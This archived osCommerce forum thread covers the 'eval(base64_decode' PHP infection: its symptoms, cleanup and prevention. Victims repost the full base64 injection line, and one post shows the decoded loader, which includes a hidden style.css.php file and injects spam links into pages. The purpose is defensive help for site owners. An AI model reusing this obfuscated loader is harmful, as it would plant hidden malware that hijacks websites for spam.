Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

eval(base64_decode Hack


FIMBLE

Recommended Posts

eval(base64_decode hack going around the internet,

 

If your cart “suddenly” stops working as it should with no input from yourselves it could be you have been subject to the latest automated hack.

Some of the more common signs of this are

* Category images stop displaying

* FCK editor refuses to display images folder

* Payment modules stop working

* Checkout process stops working

 

How will you know?

Open any PHP file on your server, if at the very top you see a line like

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKC (Goes on for a while)

Then you have been hacked.

 

To clean your site you have two options,

1, delete the entire set of PHP files on your server, (this hack will infect every single PHP file regardless of where it belongs, i.e non osC files will also be infected)

And restore from a good back up. This is the best and easy route.

 

2, You need to find the source of the files that have been placed on your server, they are always hidden well away from the top level, to do this you need to copy the top line and paste it to a Base 64 decoder, I have my own file for this but you will be able to use any of many on the internet, here is one

 

This will reveal the location of the files you have to remove, note that it could be from 1 file to upto 30, and in some cases they will overwrite the files that should be in the host folder.

 

Once this is done, and the original files are restored, you have to go through every single PHP file and remove the code from the top line, I suggest you use a search / replace tool for this or its going to take you a very long time!

 

When this has been done it will be good practice to “drop” your database, and upload a recent backup you took prior to infection, also check that there are no new users on the database, I’ve not come across this yet, but have heard it happens.

 

Now your site is free on the code, you need to prevent it from happening again.

 

How to prevent infection.

 

This is not guaranteed 100% proof but it is going to help stop re-infection.

 

Change the name of your admin folder to something less obvious.

Delete admin/filemanager.php and associated links.

Ensure that your folder permissions are never set higher than 755

Install some security addons,

Also some ideas from this post can help you,

If you do nothing, and do not rename your admin folder or delete the filemanager.php it is not a question of if, more when.

There is a lot of fragmented help on the forums, I have pulled some of it together here, read up all you can there are a lot of great people posting good information here.

Sometimes you're the dog and sometimes the lamp post

[/url]

My Contributions

Link to comment
Share on other sites

  • Replies 125
  • Created
  • Last Reply
eval(base64_decode hack going around the internet,

 

If your cart “suddenly” stops working as it should with no input from yourselves it could be you have been subject to the latest automated hack.

Some of the more common signs of this are

* Category images stop displaying

* FCK editor refuses to display images folder

* Payment modules stop working

* Checkout process stops working

 

How will you know?

Open any PHP file on your server, if at the very top you see a line like

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKC (Goes on for a while)

Then you have been hacked.

 

To clean your site you have two options,

1, delete the entire set of PHP files on your server, (this hack will infect every single PHP file regardless of where it belongs, i.e non osC files will also be infected)

And restore from a good back up. This is the best and easy route.

 

2, You need to find the source of the files that have been placed on your server, they are always hidden well away from the top level, to do this you need to copy the top line and paste it to a Base 64 decoder, I have my own file for this but you will be able to use any of many on the internet, here is one

 

This will reveal the location of the files you have to remove, note that it could be from 1 file to upto 30, and in some cases they will overwrite the files that should be in the host folder.

 

Once this is done, and the original files are restored, you have to go through every single PHP file and remove the code from the top line, I suggest you use a search / replace tool for this or its going to take you a very long time!

 

When this has been done it will be good practice to “drop” your database, and upload a recent backup you took prior to infection, also check that there are no new users on the database, I’ve not come across this yet, but have heard it happens.

 

Now your site is free on the code, you need to prevent it from happening again.

 

How to prevent infection.

 

This is not guaranteed 100% proof but it is going to help stop re-infection.

 

Change the name of your admin folder to something less obvious.

Delete admin/filemanager.php and associated links.

Ensure that your folder permissions are never set higher than 755

Install some security addons,

Also some ideas from this post can help you,

If you do nothing, and do not rename your admin folder or delete the filemanager.php it is not a question of if, more when.

There is a lot of fragmented help on the forums, I have pulled some of it together here, read up all you can there are a lot of great people posting good information here.

 

Thank you very much for the information. I found a file called NuSoup.php that I dont recognize. Could this be a file used for hacking?

I am a Jedi, like my father before me!

Link to comment
Share on other sites

Ensure that your folder permissions are never set higher than 755
It's worth noting that ownership is as important as permissions. If the web user owns the folder, then folder permissions of 755 are effectively as insecure as 777. If the configure.php file requires 444 permissions for the warning to turn off, then no file or directory should be writable, i.e. 444 permissions for files and 555 permissions for directories.

 

A better solution would be to have the web user be some account other than the main user account, but many hosts do not seem to support that.

Always back up before making changes.

Link to comment
Share on other sites

Damn, I am hacked, I saw that line since one month ago and I thought it was strange but no catched enough attention from me.

 

Now I saw some product_info.php/?fxkp=0'>forex online system trading stuff above my body html code and I said it was impossible

 

I hope to clean up my whole sites.

 

Regards

Link to comment
Share on other sites

FYI on this hack...I found where it appears as though the hack came through my community forum to get to my site. My forum admin recorded the IP address along with what looks to be all the attempts to get in to php files. So, It would certainly appear as though this was the attacker. The IP 98.206.239.156 registers out of Aurora Illinois. Anyone have the capabilities to research this IP to see if it is the hacker?

 

For what it's worth, in case any of you have a forum, he is registering under the name [email protected]

Link to comment
Share on other sites

FYI on this hack...I found where it appears as though the hack came through my community forum to get to my site. My forum admin recorded the IP address along with what looks to be all the attempts to get in to php files. So, It would certainly appear as though this was the attacker. The IP 98.206.239.156 registers out of Aurora Illinois. Anyone have the capabilities to research this IP to see if it is the hacker?

 

For what it's worth, in case any of you have a forum, he is registering under the name [email protected]

My list of banned IPs continues to grow.

Link to comment
Share on other sites

Someone else posted that their hack came from a server in a Chevy van somewhere along the arctic circle...

:huh:

 

Like vultures to a rotting carcass...

:o

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

question on the database restore part...

 

will i lose any info that i've acquired from infection (9/22) until now?

 

Yes you will, restoring will take your database and all information contained within back to the restore date.

Nic

Sometimes you're the dog and sometimes the lamp post

[/url]

My Contributions

Link to comment
Share on other sites

I also have been hacked and found the malicious code. I banned a IP address a few days ago from Russia. They were on my site 12 hours and looked suspicious.

 

I used the decode hack and it didnt work for me. Can someone tell me which files were planted and need to be removed?

 

What a mess, we work so hard to get our sites perfect, and also get top rankings, only to be hacked.

 

Weird thing is my site works just fine, but the code is in every php file, and the company forex is listed a million times behind each page in the body.

Flying away to get back to work.

Link to comment
Share on other sites

There are times when the site will function without a problem, this is what the hacker wants as they are then able to maximise the amount of time they exist on your site without discovery.

You really need to decode the line to find the place that the files are located in.

There can be a lot of files or one or two, and called different names.

style.css.php is one

dg.php another

there are .swf files also

 

With the decoder just add the code minus the <?php (' at the start and the ')?> at the end

Nic

Sometimes you're the dog and sometimes the lamp post

[/url]

My Contributions

Link to comment
Share on other sites

<b>To clean your site you have two options,</b>

1, delete the entire set of PHP files on your server, (this hack will infect every single PHP file regardless of where it belongs, i.e non osC files will also be infected)

And restore from a good back up. This is the best and easy route.

 

 

Hello, can you help?

 

Followed advise and I was infected. Have been through all files and removed all php from server. I assume that restore is done from oscommerce admin. When I go to access this i have deleted shop/admin/login.php and so can't access it to reload. I know my product information is still there in files pics etc. how can I get the missing php so I can restore?

Link to comment
Share on other sites

Hello,

 

I have tried so many ways to use the decoder you reccomend, with no luck. Here is the code:

 

**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9iaXJkc2FuZC9wdWJsaWNfaHRtbC90ZW1wL1VQU0Nob2ljZTFfOF8zXzEvY2F0YWxvZy9pbmNsdWRlcy9sYW5ndWFnZXMvZW5nbGlzaC9tb2R1bGVzL3NoaXBwaW5nL3N0eWxlLmNzcy5waHAnKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS9iaXJkc2FuZC9wdWJsaWNfaHRtbC90ZW1wL1VQU0Nob2ljZTFfOF8zXzEvY2F0YWxvZy9pbmNsdWRlcy9sYW5ndWFnZXMvZW5nbGlzaC9tb2R1bGVzL3NoaXBwaW5nL3N0eWxlLmNzcy5waHAnKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPTEwOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjQpeyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9dW5wYWNrKCd2JyxzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwxMCwyKSk7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0kUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxWzFdOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTIrJFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0UpeyRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9JFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2ODt9cmV0dXJuICRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1mdW5jdGlvbiBkZ29iaCgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKXtIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTskUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwPWd6ZGVjb2RlKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0YpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApKXtyZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbWwoKSwkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKTt9ZWxzZXtyZXR1cm4gZ21sKCkuJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>

<?php

/*

$Id: index.php 1739 2007-12-20 00:52:16Z hpdl $

 

osCommerce, Open Source E-Commerce Solutions

http://www.oscommerce.com

 

Copyright © 2003 osCommerce

 

Released under the GNU General Public License

*/

 

require('includes/application_top.php');

 

// the following cPath references come from application_top.php

$category_depth = 'top';

if (isset($cPath) && tep_not_null($cPath)) {

$categories_products_query = tep_db_query("select count(*) as total from " . TABLE_PRODUCTS_TO_CATEGORIES . " where categories_id = '" . (int)$current_category_id . "'");

$cateqories_products = tep_db_fetch_array($categories_products_query);

if ($cateqories_products['total'] > 0) {

$category_depth = 'products'; // display products

} else {

$category_parent_query = tep_db_query("select count(*) as total from " . TABLE_CATEGORIES . " where parent_id = '" . (int)$current_category_id . "'");

$category_parent = tep_db_fetch_array($category_parent_query);

if ($category_parent['total'] > 0) {

$category_depth = 'nested'; // navigate through the categories

} else {

$category_depth = 'products'; // category has no products, but display the 'no products' message

}

}

}

 

// BOF edit pages

$pages_name = "home";

$page_query = tep_db_query("select pd.pages_title, pd.pages_body, p.pages_id

Flying away to get back to work.

Link to comment
Share on other sites

here it is

'/catalog/includes/languages/english/modules/shipping/style.css.php

 

For anyone else having problems you need to strip the tags and apostrophes so it looks like

 

aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9iaXJkc2FuZC9wdWJsaWNfaHRtbC90ZW1wL1VQU0Nob2ljZTFfOF8zXzEvY2F0YWxvZy9pbmNsdWRlcy9sYW5ndWFnZXMvZW5nbGlzaC9tb2R1bGVzL3NoaXBwaW5nL3N0eWxlLmNzcy5waHAnKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS9iaXJkc2FuZC9wdWJsaWNfaHRtbC90ZW1wL1VQU0Nob2ljZTFfOF8zXzEvY2F0YWxvZy9pbmNsdWRlcy9sYW5ndWFnZXMvZW5nbGlzaC9tb2R1bGVzL3NoaXBwaW5nL3N0eWxlLmNzcy5waHAnKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPTEwOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjQpeyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9dW5wYWNrKCd2JyxzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwxMCwyKSk7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0kUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxWzFdOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTIrJFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0UpeyRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9JFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2ODt9cmV0dXJuICRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1mdW5jdGlvbiBkZ29iaCgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKXtIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTskUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwPWd6ZGVjb2RlKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0YpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApKXtyZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbWwoKSwkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKTt9ZWxzZXtyZXR1cm4gZ21sKCkuJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ==

 

Nic

Sometimes you're the dog and sometimes the lamp post

[/url]

My Contributions

Link to comment
Share on other sites

here it is

'/catalog/includes/languages/english/modules/shipping/style.css.php

 

Nic

 

So besides cleaning or replacing each php file, is that the only file that needs to be removed?

Flying away to get back to work.

Link to comment
Share on other sites

you need to compare the folder contents with either your back up or another trusted source, as ive said a few times here there can be many new files added.

You will be better off deleting the folder and uploading a good one.

Nic

Sometimes you're the dog and sometimes the lamp post

[/url]

My Contributions

Link to comment
Share on other sites

Nic found 35 hidden files in my site that didnt belong there. One of the files was style.css, some people might have missed that one. He cleaned all the files and my site is perfect now.

 

I have one question though. The malicious code advertised the company Forex all over my site behind the pages. I have heard hackers do this to get higher rankings in search engines that spider our sites. Does this mean someone who works for Forex did this?

 

Even though my team the Dallas Cowboys lost, I can sleep good knowing my site is up and running.

 

Funny I am sleeping when most of you are awake and vise versa.

 

Best wishes!

Sam- in Texas

Flying away to get back to work.

Link to comment
Share on other sites

Joining the club - Hacked - and my team lost again today.

 

I can confirm that any php file, even simple redirects in subdomains, will get nailed. Incidentally I had 755 as the minimum, but now I know better.

 

Anyone know if they are smart enough to hide these files in directories other than OsCommerce such as WordPress or Joomla?

 

Obviously the authors "like" OsCommerce.

Link to comment
Share on other sites

 

Anyone know if they are smart enough to hide these files in directories other than OsCommerce such as WordPress or Joomla?

 

 

After a quick check it seems that most of the open source php programs were hit, which includes WordPress and Joomla. One thing in common is the use of 'Admin' or 'Administration' in folder and file names. The WordPress discussions are advising the deletion and reloading of dbases.

Link to comment
Share on other sites

After a quick check it seems that most of the open source php programs were hit, which includes WordPress and Joomla. One thing in common is the use of 'Admin' or 'Administration' in folder and file names. The WordPress discussions are advising the deletion and reloading of dbases.

 

permissions are not the determining factor for this attack, its the presence of the admin folder still called admin, and the filemanager.php.

Once in it will spread to any PHP file platform / package independent adding its code as it goes.

I can imagine in a lot of cases there will be many more php files that osC ones.

Sometimes you're the dog and sometimes the lamp post

[/url]

My Contributions

Link to comment
Share on other sites

Question

 

I have one question. The malicious code advertised the company Forex all over my site behind the pages. I have heard hackers do this to get higher rankings in search engines that spider our sites. Does this mean someone who works for Forex did this?

Flying away to get back to work.

Link to comment
Share on other sites

I was able to decode mine and found out that the file was added to a wordpress blog that i have on another domain that is hosted within my oscommerce store account

 

I decided to delete the whole blog from the server.

 

I still have a question about the code, which I have pasted below already decoded...As you see, there is still a lot of it not decoded follow by a "gzdecode" How can I decode that?

 

if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/content/y/o/g/yogicchai/html/pilotbaba/blog/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/style.css.php')){include_once('/home/content/y/o/g/yogicchai/html/pilotbaba/blog/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/style.css.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($R20FD65E9C7406034FADC682F06732868){$R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));$R60169CD1C47B7A7A85AB44F884635E41=10;$R0D54236DA20594EC13FC81B209733931=0;if($R6B6E98CDE8B33087A33E4D3A497BD86B&4){$R0D54236DA20594EC13FC81B209733931=unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));$R0D54236DA20594EC13FC81B209733931=$R0D54236DA20594EC13FC81B209733931[1];$R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA20594EC13FC81B209733931;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&8){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&16){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&2){$R60169CD1C47B7A7A85AB44F884635E41+=2;}$RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE){$RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868;}return $RC4A5B5E310ED4C323E04D72AFAE39F53;}}function dgobh($RDA3E61414E50AEE968132F03D265E0CF){Header('Content-Encoding: none');$R3E33E017CD76B9B7E6C7364FB91E2E90=gzdecode($RDA3E61414E50AEE968132F03D265E0CF);if(preg_match('/\<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);}else{return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;}}ob_start('dgobh');}}}

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...